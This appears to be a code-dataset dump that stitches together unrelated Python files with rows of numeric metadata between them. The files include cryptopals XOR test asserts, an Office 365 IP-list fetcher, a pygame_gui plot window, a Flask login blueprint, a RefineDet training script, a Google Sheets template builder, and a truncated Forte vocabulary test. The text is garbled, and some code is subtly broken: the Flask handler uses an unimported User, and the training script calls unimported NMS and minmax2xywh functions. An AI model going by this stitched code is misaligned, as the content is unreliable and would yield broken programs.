'f6d') \
== 'SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t'
# 2. Fixed XOR
assert xor_fixed_buffers('1c0111001f010100061a024b53535009181c',
'686974207468652062756c6c277320657965') \
== '746865206b696420646f6e277420706c6179'
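    # Hedged extra check (not in the original): round-trip the base64 output
    # back to hex with the standard library to confirm the conversion.
    hex_in = '1c0111001f010100061a024b53535009181c'
    assert base64.b64decode(convert_hex_to_base64(hex_in)).hex() == hex_in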
| 23.175676
| 77
| 0.661224
| 187
| 1,715
| 5.850267
| 0.304813
| 0.063985
| 0.065814
| 0.065814
| 0.080439
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18124
| 0.266472
| 1,715
| 73
| 78
| 23.493151
| 0.688394
| 0.304373
| 0
| 0
| 0
| 0
| 0.244898
| 0.235138
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.090909
| false
| 0
| 0.045455
| 0
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af3fd4c2face07438cfa2add7939e20eaaa6ebd0
| 7,748
|
py
|
Python
|
o365_ip.py
|
satchm0h/o365_ip
|
1845fc6e5a2414f23bbce82784f4e7f0cac6528b
|
[
"MIT"
] | 1
|
2020-11-01T11:03:01.000Z
|
2020-11-01T11:03:01.000Z
|
o365_ip.py
|
satchm0h/o365_ip
|
1845fc6e5a2414f23bbce82784f4e7f0cac6528b
|
[
"MIT"
] | null | null | null |
o365_ip.py
|
satchm0h/o365_ip
|
1845fc6e5a2414f23bbce82784f4e7f0cac6528b
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
import os
import sys
import json
import uuid
import argparse
import logging
import coloredlogs
import requests
# Defining the default values that can be overridden on the CLI
DEFAULTS = {
'guidfile': 'client-guid',
'outfile': 'last-dump',
'verfile': 'last-version',
'instance': 'Worldwide'
}
def main(options):
    # Let's do the work. See init() at the bottom for the 'options' logic.
logging.info('Starting')
if options.force:
if options.deltafile:
if os.path.isfile(options.deltafile):
os.remove(options.deltafile)
if os.path.isfile(options.verfile):
os.remove(options.verfile)
if os.path.isfile(options.outfile):
os.remove(options.outfile)
# If we are doing a delta, wipe any previous delta file
if options.deltafile is not None:
write_json_file(options.deltafile, {})
# If there is no update we are done, unless forced
(new_version, previous_version) = get_versions(options.version_url,
options.verfile)
if new_version == previous_version:
logging.info('Version matches previous. No update')
sys.exit(0)
# Download and process the latest IPs
ip_struct = get_ip_addresses(options.data_url, options.optional)
    # Calculate the delta if we are asked to do so
if options.deltafile is not None:
generate_delta(ip_struct, options.outfile, options.deltafile)
logging.info(f'Delta File: {options.deltafile}')
# Dump the latest results to disk
write_json_file(options.outfile, ip_struct, True)
commit_processed_version(options.verfile, new_version)
logging.info(f'Output File: {options.outfile}')
logging.info('Complete!')
def write_json_file(filename, data, pretty=False):
# Dump a python data structure to JSON FILE
logging.debug(f'Writing JSON File : {filename}')
with open(filename, 'w') as file_handle:
if pretty:
json.dump(data, file_handle, indent=2)
else:
json.dump(data, file_handle)
def get_versions(url, filename):
    # Here we want to determine if there is a new version to process or not
previous_version = "42"
logging.debug('Downloading Version Information')
current_version = get_version_info(url)
# If we've run before, read in the version last processed
if os.path.isfile(filename):
previous_version = read_single_state(filename)
if current_version == previous_version:
logging.debug(f'No version change: {current_version}')
else:
logging.debug(f'New version discovered: {current_version}')
return (current_version, previous_version)
def commit_processed_version(filename, version):
# Write out the version we have finished processing
logging.debug(f'Writing last processed version to: {filename}')
write_single_state(filename, version)
def get_version_info(url):
version_info = requests.get(url).json()
if 'latest' in version_info:
return version_info['latest']
return None
def read_single_state(filename):
logging.debug(f'Read state file: {filename}')
with open(filename, 'r') as file_handle:
return file_handle.readline().rstrip()
def write_single_state(filename, value):
logging.debug(f'Write state file: {filename}')
with open(filename, 'w') as file_handle:
print(value, file=file_handle)
def generate_delta(data, filename, deltafile):
logging.debug('Generating Delta')
delta = {'add': [], 'remove': []}
previous = {}
# If there is a previous run, lets load it.
if os.path.isfile(filename):
with open(filename, 'r') as file_handle:
previous = json.load(file_handle)
# Find new additions
for ip in data:
if ip not in previous:
delta['add'].append(ip)
# Find removals
for ip in previous:
if ip not in data:
delta['remove'].append(ip)
# Write out the Delta
write_json_file(deltafile, delta, True)
def init_deltafile(filename):
logging.debug(f'Initializing Delta File : {filename}')
if os.path.isfile(filename):
with open(filename, 'w') as file_handle:
            # Empty object in case there are no changes
print('{}', file=file_handle)
def get_ip_addresses(url, include_optional):
logging.debug(f'Include optional IPs: {include_optional}')
    # We are going to accumulate IPs in dicts to de-dup
ips = {}
records = requests.get(url).json()
for record in records:
if 'ips' in record:
for ip in record['ips']:
if record['required']:
ips[ip] = 42
elif include_optional:
ips[ip] = 42
return ips
def init():
'''
init()
Handle command line args, setup log, etc..
'''
global DEFAULTS
# Configure log
coloredlogs.install(level='DEBUG',
fmt='%(asctime)s %(levelname)s %(message)s')
# Supress requests log
logging.getLogger('requests').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
# Handle command line args
parser = argparse.ArgumentParser(
description='Get Microsoft Office 365 IP lists.')
    # Option strings fixed: '-D, --debug' as a single string is not a valid argparse spec.
    parser.add_argument('-D', '--debug', dest='debug',
                        help='Enable debug-level log output',
                        action='store_true')
    parser.add_argument('-f', '--force', dest='force',
                        help='Download update even if version has not changed',
                        action='store_true')
    parser.add_argument('-o', '--outfile', dest='outfile',
                        help='Full download output',
                        default=DEFAULTS['outfile'])
    parser.add_argument('-v', '--verfile', dest='verfile',
                        help='File to store version information',
                        default=DEFAULTS['verfile'])
    parser.add_argument('-d', '--deltafile', dest='deltafile',
                        help='Generate delta to file',
                        default=None)
    parser.add_argument('-g', '--guidfile', dest='guidfile',
                        help='File to load guid from. Will generate if file not found',
                        default=DEFAULTS['guidfile'])
    parser.add_argument('-i', '--instance', dest='instance',
                        help='Microsoft Office 365 Instance',
                        choices=['Worldwide', 'China', 'Germany',
                                 'USGovDoD', 'USGovGCCHigh'],
                        default=DEFAULTS['instance'])
    parser.add_argument('-p', '--disable_optional_ips', dest='optional',
                        help='Do not include optional IPs',
                        action='store_false')
options = parser.parse_args()
# Enable debug
if not options.debug:
coloredlogs.decrease_verbosity()
    # Read the client guid from file, or generate one and write it to file for
    # subsequent runs. Note: Microsoft asks for a unique UUID per "system" that
    # accesses the API.
if os.path.isfile(options.guidfile):
options.client_guid = read_single_state(options.guidfile)
else:
options.client_guid = uuid.uuid4()
write_single_state(options.guidfile, options.client_guid)
# Build the URLs based on the Instance selection and our guid
base_url = 'https://endpoints.office.com'
options.version_url = f'{base_url}/version/{options.instance}/?clientrequestid={options.client_guid}'
options.data_url = f'{base_url}/endpoints/{options.instance}/?clientrequestid={options.client_guid}'
return options
if __name__ == '__main__':
main(init())
| 33.834061
| 105
| 0.63126
| 944
| 7,748
| 5.068856
| 0.258475
| 0.022989
| 0.021735
| 0.020481
| 0.143365
| 0.108882
| 0.061651
| 0.046186
| 0.017137
| 0
| 0
| 0.002978
| 0.263294
| 7,748
| 228
| 106
| 33.982456
| 0.835319
| 0.141585
| 0
| 0.125
| 0
| 0
| 0.208548
| 0.026675
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072368
| false
| 0
| 0.052632
| 0
| 0.164474
| 0.013158
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af4465eb1740d25f4243ab38dfe29940e3f43d6f
| 1,508
|
py
|
Python
|
pygame_matplotlib/gui_window.py
|
lionel42/pygame-matplotlib-backend
|
7b15c06189e0b690a0ec5ba83e6b9759f940642e
|
[
"MIT"
] | 3
|
2021-12-13T17:56:15.000Z
|
2022-03-03T21:00:24.000Z
|
pygame_matplotlib/gui_window.py
|
lionel42/pygame-matplotlib-backend
|
7b15c06189e0b690a0ec5ba83e6b9759f940642e
|
[
"MIT"
] | 1
|
2021-11-28T12:02:52.000Z
|
2021-12-21T09:04:41.000Z
|
pygame_matplotlib/gui_window.py
|
lionel42/pygame-matplotlib-backend
|
7b15c06189e0b690a0ec5ba83e6b9759f940642e
|
[
"MIT"
] | null | null | null |
"""Contain a window with a plot for pygame_gui."""
from typing import Union
import pygame
import pygame_gui
from pygame_gui.core.interfaces.manager_interface import IUIManagerInterface
from pygame_gui.core.ui_element import ObjectID
from .backend_pygame import FigureSurface
import matplotlib
matplotlib.use("module://pygame_matplotlib.backend_pygame")
class UIPlotWindow(pygame_gui.elements.ui_window.UIWindow):
def __init__(
self,
rect: pygame.Rect,
manager: IUIManagerInterface,
figuresurface: FigureSurface,
window_display_title: str = "",
element_id: Union[str, None] = None,
object_id: Union[ObjectID, str, None] = None,
resizable: bool = False,
visible: int = 1,
):
self.figuresurf = figuresurface
super().__init__(
rect,
manager,
window_display_title=window_display_title,
element_id=element_id,
object_id=object_id,
resizable=resizable,
visible=visible,
)
def set_dimensions(self, *args, **kwargs):
super().set_dimensions(*args, **kwargs)
print("setting dimensions")
# Update the size of the figure with the new bounding rectangle
self.figuresurf.set_bounding_rect(self.get_container().get_rect())
self.update_window_image()
def update_window_image(self):
# Update the image of the container
self.get_container().set_image(self.figuresurf)
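A hedged construction sketch for the window above; `fig_surface` stands in for a FigureSurface produced by the pygame backend (its exact creation path is not shown in this file and is an assumption):

# Hedged usage sketch; not part of the original file.
import pygame
import pygame_gui

pygame.init()
screen = pygame.display.set_mode((800, 600))
manager = pygame_gui.UIManager((800, 600))
plot_window = UIPlotWindow(
    rect=pygame.Rect(50, 50, 500, 400),
    manager=manager,
    figuresurface=fig_surface,  # assumption: a FigureSurface built elsewhere
    window_display_title="My plot",
    resizable=True,
)
plot_window.update_window_image()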
| 31.416667
| 76
| 0.670424
| 172
| 1,508
| 5.627907
| 0.372093
| 0.046488
| 0.055785
| 0.035124
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000878
| 0.244695
| 1,508
| 47
| 77
| 32.085106
| 0.84899
| 0.093501
| 0
| 0
| 0
| 0
| 0.043382
| 0.030147
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081081
| false
| 0
| 0.189189
| 0
| 0.297297
| 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af454b0c2f018d2a6fb480e99014829738475907
| 955
|
py
|
Python
|
simpledu/handlers/front.py
|
xizhongzhao/simpledu
|
bf78435caa45d28118cdde3db73c078cf7ff55b1
|
[
"Apache-2.0"
] | null | null | null |
simpledu/handlers/front.py
|
xizhongzhao/simpledu
|
bf78435caa45d28118cdde3db73c078cf7ff55b1
|
[
"Apache-2.0"
] | null | null | null |
simpledu/handlers/front.py
|
xizhongzhao/simpledu
|
bf78435caa45d28118cdde3db73c078cf7ff55b1
|
[
"Apache-2.0"
] | null | null | null |
from flask import Blueprint,render_template,flash,url_for,redirect
from simpledu.models import Course, User  # User is needed in login(); assuming it is defined in simpledu.models
from simpledu.forms import LoginForm,RegisterForm
from flask_login import login_user
front = Blueprint('front',__name__)
@front.route('/')
def index():
courses = Course.query.all()
return render_template('index.html',courses=courses)
@front.route('/login', methods=['GET', 'POST'])  # POST is required for validate_on_submit() to ever pass
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
login_user(user,form.remember_me.data)
return redirect(url_for('.index'))
return render_template('login.html',form=form)
@front.route('/register',methods=['GET','POST'])
def register():
form = RegisterForm()
if form.validate_on_submit():
form.create_user()
flash('register success!please login','success')
return redirect(url_for('.login'))
return render_template('register.html',form=form)
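For completeness, a hedged sketch of attaching the blueprint above to an application (the import path mirrors the file path and is an assumption):

# Hedged wiring sketch; not part of the original file.
from flask import Flask
from simpledu.handlers.front import front

app = Flask(__name__)
app.register_blueprint(front)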
| 31.833333
| 66
| 0.710995
| 123
| 955
| 5.349594
| 0.382114
| 0.085106
| 0.091185
| 0.048632
| 0.066869
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149738
| 955
| 29
| 67
| 32.931034
| 0.810345
| 0
| 0
| 0.08
| 0
| 0
| 0.114136
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0
| 0.16
| 0
| 0.48
| 0.08
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af456070653a62afea1b52eac295ba59531bc4a5
| 6,151
|
py
|
Python
|
main.py
|
sadegh1404/Refinedet_saffran
|
3c756fe16b75e83630553b64cb9cb53203b9cb81
|
[
"MIT"
] | null | null | null |
main.py
|
sadegh1404/Refinedet_saffran
|
3c756fe16b75e83630553b64cb9cb53203b9cb81
|
[
"MIT"
] | null | null | null |
main.py
|
sadegh1404/Refinedet_saffran
|
3c756fe16b75e83630553b64cb9cb53203b9cb81
|
[
"MIT"
] | null | null | null |
import argparse
import numpy as np
import os
from os import path
import tensorflow as tf
from tensorflow.keras.callbacks import ModelCheckpoint
from models import RefineDetVGG16
# NMS and minmax2xywh are used in the test loop below but were never imported;
# assuming they live in utils alongside the other helpers.
from utils import (read_jpeg_image, resize_image_and_boxes, absolute2relative,
                   NMS, minmax2xywh)
from saffran.saffran_data_loader import load_saffran_dataset
from saffran.augmentations import Augmentation
from saffran.config import IMAGE_SIZE, BATCH_SIZE, SHUFFLE_BUFFER, NUM_CLASS, LR_SCHEDULE, MOMENTUM, NUM_EPOCHS, STEPS_PER_EPOCH
parser = argparse.ArgumentParser()
parser.add_argument('--saffran_root', type=str, default='./data/Saffron_Dataset/Labeled/',
help='Path to the VOCdevkit directory.')
parser.add_argument('--checkpoint', type=str, default=None,
help='Path to the weights file, in the case of resuming training.')
parser.add_argument('--initial_epoch', type=int, default=0,
help='Starting epoch. Give a value bigger than zero to resume training.')
parser.add_argument('--batch_size', type=int, default=None,
help='Useful for quick tests. If not provided, the value in the config file is used instead.')
args = parser.parse_args()
BATCH_SIZE = args.batch_size or BATCH_SIZE
def build_dataset(img_paths, bboxes, repeat=False, shuffle=False,
drop_remainder=False, augmentation_fn=None):
row_lengths = [len(img_bboxes) for img_bboxes in bboxes]
bboxes_concat = np.concatenate(bboxes, axis=0)
bboxes = tf.RaggedTensor.from_row_lengths(values=bboxes_concat,
row_lengths=row_lengths)
dataset = tf.data.Dataset.from_tensor_slices((img_paths, bboxes))
if repeat:
dataset = dataset.repeat()
if shuffle:
dataset = dataset.shuffle(len(img_paths),
reshuffle_each_iteration=True)
dataset = dataset.map(lambda img_path, boxes:
(read_jpeg_image(img_path), boxes))
if augmentation_fn:
dataset = dataset.map(augmentation_fn)
dataset = dataset.map(lambda image, boxes:
resize_image_and_boxes(image, boxes, IMAGE_SIZE))
dataset = dataset.map(lambda image, boxes:
(image, absolute2relative(boxes, tf.shape(image))))
# This hack is to allow batching into ragged tensors
dataset = dataset.map(lambda image, boxes:
(image, tf.expand_dims(boxes, 0)))
dataset = dataset.map(lambda image, boxes:
(image, tf.RaggedTensor.from_tensor(boxes)))
dataset = dataset.batch(BATCH_SIZE, drop_remainder=drop_remainder)
dataset = dataset.map(lambda image, boxes:
(image, boxes.merge_dims(1, 2)))
return dataset
train_img_paths, train_bboxes = load_saffran_dataset(dataroot=args.saffran_root)
print('INFO: Loaded %d training samples' % len(train_img_paths))
# Classes start at 0
for i in train_bboxes:
    i[:, -1] = i[:, -1] - 1
train_data = build_dataset(train_img_paths, train_bboxes,
repeat=True, shuffle=True, drop_remainder=True,
augmentation_fn=Augmentation())
print(train_data)
print('INFO: Instantiating model...')
model = RefineDetVGG16(num_classes=NUM_CLASS,aspect_ratios=[1.0])
model.build(input_shape=(BATCH_SIZE, IMAGE_SIZE[0], IMAGE_SIZE[1], 3))
if args.checkpoint:
model.load_weights(args.checkpoint)
else:
model.base.load_weights(
path.join('weights', 'VGG_ILSVRC_16_layers_fc_reduced.h5'), by_name=True)
lr_scheduler = tf.keras.optimizers.schedules.PiecewiseConstantDecay(*LR_SCHEDULE)
optimizer = tf.keras.optimizers.SGD(lr_scheduler, momentum=MOMENTUM)
optimizer.iterations = tf.Variable(STEPS_PER_EPOCH * args.initial_epoch)
print('Training at learning rate =', optimizer._decayed_lr(tf.float32))
model.compile(optimizer=optimizer)
os.makedirs('weights', exist_ok=True)
callbacks = [
ModelCheckpoint(path.join('weights', 'refinedet_vgg16_{epoch:0d}.h5'),
monitor='total_loss')
]
history = model.fit(train_data, epochs=NUM_EPOCHS, steps_per_epoch=STEPS_PER_EPOCH,
initial_epoch=args.initial_epoch, callbacks=callbacks)
import cv2
import matplotlib.pyplot as plt
def sind(x):
return np.sin(x / 180*np.pi)
def cosd(x):
return np.cos(x / 180*np.pi)
def draw_line_segment(image, center, angle, color, length=40, thickness=3):
x1 = center[0] - cosd(angle) * length / 2
x2 = center[0] + cosd(angle) * length / 2
y1 = center[1] - sind(angle) * length / 2
y2 = center[1] + sind(angle) * length / 2
cv2.line(image, (int(x1 + .5), int(y1 + .5)), (int(x2 + .5), int(y2 + .5)), color, thickness)
def draw_output_lines(centers_box, test, print_conf=False, resize=False):  # typo fixed: was draw_ouput_lines
out = []
if resize:
test = cv2.resize(test,resize)
SIZE2,SIZE1 = resize
else:
SIZE1,SIZE2 = 640,640
if print_conf:
print(centers_box[:,-1])
for i in centers_box:
cx = i[0] * SIZE2
cy = i[1] * SIZE1
label = i[-2]
confidence = i[-1]
angle = np.arccos(label/NUM_CLASS)*(180/np.pi)
draw_line_segment(test,(cx,cy),angle,(255,255,0))
out.append('{} {} {} {}'.format(str(cx),str(cy),str(angle),str(confidence)))
plt.figure(figsize=(10,10))
plt.imshow(test)
plt.show()
return out
SIZE=640
test_dir = 'data/Saffron_Dataset/Test/' # CHANGE HERE TO CHANGE TEST DIRECTORY
test_images = os.listdir(test_dir)
for img_name in test_images:
if img_name.endswith('.txt'):
continue
img = cv2.imread(test_dir+img_name)
img = img.astype(np.float64)
org_shape = img.shape
img = cv2.resize(img,(SIZE,SIZE))
img = np.expand_dims(img,0)
out_boxes = model(img,decode=True)
nms_box = NMS(out_boxes[0],top_k=500,nms_threshold=0.1)
centers_box = minmax2xywh(nms_box)
    out = draw_output_lines(centers_box, img[0].astype(np.uint8), False, resize=org_shape[:2][::-1])
out = '\n'.join(out)
with open(test_dir + img_name.split('.')[0]+'.txt','w') as f:
f.write(out)
| 35.761628
| 128
| 0.667859
| 840
| 6,151
| 4.709524
| 0.310714
| 0.035389
| 0.030081
| 0.034884
| 0.126896
| 0.086704
| 0.039434
| 0.020222
| 0
| 0
| 0
| 0.02316
| 0.213786
| 6,151
| 172
| 129
| 35.761628
| 0.794872
| 0.017396
| 0
| 0.054264
| 0
| 0
| 0.092053
| 0.019868
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03876
| false
| 0
| 0.100775
| 0.015504
| 0.170543
| 0.054264
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af4ba5a904905887481da5fbd8875608d26d4c5d
| 7,649
|
py
|
Python
|
scripts/make_template.py
|
ebi-ait/lattice-tools
|
7d72b04fae879f4330702df93bbfc0ea8a6bbdaa
|
[
"MIT"
] | null | null | null |
scripts/make_template.py
|
ebi-ait/lattice-tools
|
7d72b04fae879f4330702df93bbfc0ea8a6bbdaa
|
[
"MIT"
] | 3
|
2021-02-09T14:57:00.000Z
|
2021-09-27T23:23:45.000Z
|
scripts/make_template.py
|
ebi-ait/lattice-tools
|
7d72b04fae879f4330702df93bbfc0ea8a6bbdaa
|
[
"MIT"
] | 1
|
2022-02-23T14:21:17.000Z
|
2022-02-23T14:21:17.000Z
|
import argparse
import gspread
import json
import lattice
import requests
import string
import sys
from collections import OrderedDict
from gspread_formatting import *
from oauth2client.service_account import ServiceAccountCredentials
from urllib.parse import urljoin
def getArgs():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('-t','--type',
help="the object type to return a template for")
parser.add_argument('-m','--mode',
help="the server to look-up schema, if not local")
parser.add_argument('-c','--creds',
help="the location of google drive client_secret.json file")
parser.add_argument('-s','--sheet',
help="the key for the google sheet")
args = parser.parse_args()
return args
args = getArgs()
if not args.type:
sys.exit('ERROR: --type is required')
if not args.creds:
sys.exit('ERROR: --creds is required')
if not args.sheet:
sys.exit('ERROR: --sheet is required')
if not args.mode:
sys.exit('ERROR: --mode is required')
schema_name = args.type
# follow instructions here to enable API & generate credentials
# https://www.twilio.com/blog/2017/02/an-easy-way-to-read-and-write-to-a-google-spreadsheet-in-python.html
creds = ServiceAccountCredentials.from_json_keyfile_name(args.creds, 'https://www.googleapis.com/auth/drive')
client = gspread.authorize(creds)
sheet = client.open_by_key(args.sheet)
for tab in sheet.worksheets():
if tab.title == schema_name:
sheet.del_worksheet(tab)
tab = sheet.add_worksheet(title=schema_name,rows='100',cols='52')
abcs = string.ascii_uppercase
cell_grid = list(abcs) + ['A' + i for i in abcs]
connection = lattice.Connection(args.mode)
server = connection.server
# grab the OntologyTerm term_name & term_id schemas to put in places that linkTo OntologyTerm
ont_schema_url = urljoin(server, 'profiles/ontology_term/?format=json')
ont_schema = requests.get(ont_schema_url).json()
term_id_props = ont_schema['properties']['term_id']
term_name_props = ont_schema['properties']['term_name']
# grab all of the submittable properties
props = {}
schema_url = urljoin(server, 'profiles/' + schema_name + '/?format=json')
schema = requests.get(schema_url).json()
for p in schema['properties'].keys():
props[p] = schema['properties'][p]
ordered_props = OrderedDict(props)
# grab all of the properties of subobjects
subprops = {}
non_submit = [] # collect the base property so we can grey it out in favor of the subproperties
for p in props.keys():
if props[p]['type'] == 'object' or \
(props[p]['type'] == 'array' and props[p]['items']['type'] == 'object'):
subprops[p] = props[p]
ordered_props.pop(p)
non_submit.append(p)
if props[p]['type'] == 'array':
for sp in props[p]['items']['properties'].keys():
if props[p]['items']['properties'][sp]['type'] == 'object' or \
(props[p]['items']['properties'][sp]['type'] == 'array' and props[p]['items']['properties'][sp]['items']['type'] == 'object'):
subprops[p + '.' + sp] = props[p]['items']['properties'][sp]
non_submit.append(p + '.' + sp)
if props[p]['items']['properties'][sp]['type'] == 'array':
for ssp in props[p]['items']['properties'][sp]['items']['properties'].keys():
subprops[p + '.' + sp + '.' + ssp] = props[p]['items']['properties'][sp]['items']['properties'][ssp]
else:
for ssp in props[p]['items']['properties'][sp]['items']['properties'].keys():
subprops[p + '.' + sp + '.' + ssp] = props[p]['items']['properties'][sp]['properties'][ssp]
else:
subprops[p + '.' + sp] = props[p]['items']['properties'][sp]
else:
my_props = props[p]['properties']
for sp in my_props.keys():
subprops[p + '.' + sp] = my_props[sp]
ordered_props.update(subprops)
remove_props = []
ont_props = []
for p in ordered_props.keys():
if str(ordered_props[p].get('comment')).startswith('Do not submit') \
or ordered_props[p].get('notSubmittable') == True:
remove_props.append(p)
if p in non_submit:
non_submit.remove(p)
elif ordered_props[p].get('linkTo') == 'OntologyTerm':
remove_props.append(p)
ont_props.append(p)
for p in remove_props:
del ordered_props[p]
for p in ont_props:
ordered_props[p + '.term_id'] = term_id_props
ordered_props[p + '.term_name'] = term_name_props
non_submit_col = []
for p in non_submit:
non_submit_col.append(cell_grid[list(ordered_props.keys()).index(p) + 1])
# collect required fields & move fields to the front
req_props = []
if schema.get('required'):
req_count = 0
req_props = schema['required']
for i in req_props:
if i in ordered_props:
ordered_props.move_to_end(i, False)
req_count += 1
else:
ordered_props.move_to_end(i + '.term_id', False)
ordered_props.move_to_end(i + '.term_name', False)
req_count += 2
# get the required field columns so we can color them later
req_columns = []
if req_props:
if 'aliases' in ordered_props.keys():
ordered_props.move_to_end('aliases', False)
req_start_col = 'C'
req_stop_col = cell_grid[req_count + 1]
else:
req_start_col = 'B'
req_stop_col = cell_grid[req_count]
req_columns = ':'.join([req_start_col, req_stop_col])
# list the attributes we want to know about each property
descriptor_list = [
'title',
'description',
'comment',
'type',
'linkTo',
'enum'
]
uber_list = []
# gather the top row list of schema_version followed by the property names
schema_version = schema['properties']['schema_version']['default']
prop_list = ['schema_version=' + schema_version]
for p in ordered_props.keys():
prop_list.append(p)
uber_list.append(prop_list)
# gather the attributes of each property
for descriptor in descriptor_list:
this_list = ['#' + descriptor]
for p in ordered_props.keys():
if ordered_props[p]['type'] == 'array' and descriptor in ['type','enum','linkTo']:
if ordered_props[p]['items'].get(descriptor):
this_list.append('array of ' + str(ordered_props[p]['items'].get(descriptor,'')))
else:
this_list.append('')
else:
this_list.append(str(ordered_props[p].get(descriptor,'')))
uber_list.append(this_list)
# write the whole thing to the google sheet
tab.update('A1',uber_list)
# bold the first column
tab.format('A:A', {'textFormat': {'bold': True}})
# set the whole sheet to clip text
tab.format('A1:AZ100',{'wrapStrategy': 'CLIP'})
# set cell validation in the first input row for all boolean fields or fields with an enum list
count = 0
for p in ordered_props.keys():
count += 1
if ordered_props[p].get('enum') or ordered_props[p].get('type') == 'boolean':
col = cell_grid[count]
cell_to_format = col + str(len(descriptor_list) + 2) + ':' + col + '100'
validation_rule = DataValidationRule(BooleanCondition('ONE_OF_LIST',
ordered_props[p].get('enum', ['TRUE','FALSE'])),
showCustomUi=True)
set_data_validation_for_cell_range(tab, cell_to_format, validation_rule)
# aliases should be the first property listed, so freeze that column and the descriptor column
if ordered_props.get('aliases'):
set_frozen(tab, rows=len(descriptor_list) + 1, cols=2)
else:  # if no aliases property, then just freeze the descriptor column
set_frozen(tab, rows=len(descriptor_list) + 1, cols=1)
# shade all of the columns with required properties
if req_columns:
green = color(0.58, 0.77, 0.49)
format_cell_range(tab, req_columns, cellFormat(backgroundColor=green))
# for the properties with embedded objects, shade the non-submittable property
for column in non_submit_col:
grey = color(0.85, 0.85, 0.85)
format_cell_range(tab, column, cellFormat(backgroundColor=grey))
| 35.576744
| 130
| 0.697085
| 1,127
| 7,649
| 4.574978
| 0.221828
| 0.036074
| 0.029868
| 0.044802
| 0.242824
| 0.155935
| 0.11249
| 0.061676
| 0.048487
| 0.033747
| 0
| 0.007697
| 0.150739
| 7,649
| 214
| 131
| 35.742991
| 0.786022
| 0.152569
| 0
| 0.104651
| 0
| 0
| 0.173011
| 0.005416
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005814
| false
| 0
| 0.063953
| 0
| 0.075581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af4fa2ce445c7c2f288125fe751a69825469c270
| 8,191
|
py
|
Python
|
tests/forte/data/vocabulary_test.py
|
bhaskar2443053/forte
|
95fabd94126d45c0db07cdcc197049ed1859d228
|
[
"Apache-2.0"
] | null | null | null |
tests/forte/data/vocabulary_test.py
|
bhaskar2443053/forte
|
95fabd94126d45c0db07cdcc197049ed1859d228
|
[
"Apache-2.0"
] | null | null | null |
tests/forte/data/vocabulary_test.py
|
bhaskar2443053/forte
|
95fabd94126d45c0db07cdcc197049ed1859d228
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Forte Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle as pkl
import unittest
from itertools import product
from ddt import ddt, data, unpack
from asyml_utilities.special_tokens import SpecialTokens
from forte.common import InvalidOperationException
from forte.data import dataset_path_iterator
from forte.data.vocabulary import Vocabulary, FrequencyVocabFilter
@ddt
class VocabularyTest(unittest.TestCase):
def setUp(self):
self.data_path = os.path.abspath(
os.path.join(
os.path.dirname(__file__),
"../../../",
"data_samples",
"random_texts",
)
)
def argmax(self, one_hot):
idx = -1
for i, flag in enumerate(one_hot):
if flag:
self.assertTrue(idx == -1)
idx = i
return idx
def test_vocabulary(self):
methods = ["indexing", "one-hot"]
flags = [True, False]
for method, need_pad, use_unk in product(methods, flags, flags):
# As stated here: https://github.com/python/typing/issues/511
# If we use the generic type here we cannot pickle the class
# in python 3.6 or earlier (the issue is fixed in 3.7).
# So here we do not use the type annotation for testing.
vocab = Vocabulary(method=method, use_pad=need_pad, use_unk=use_unk)
# Check vocabulary add_element, element2repr and id2element
elements = [
"EU",
"rejects",
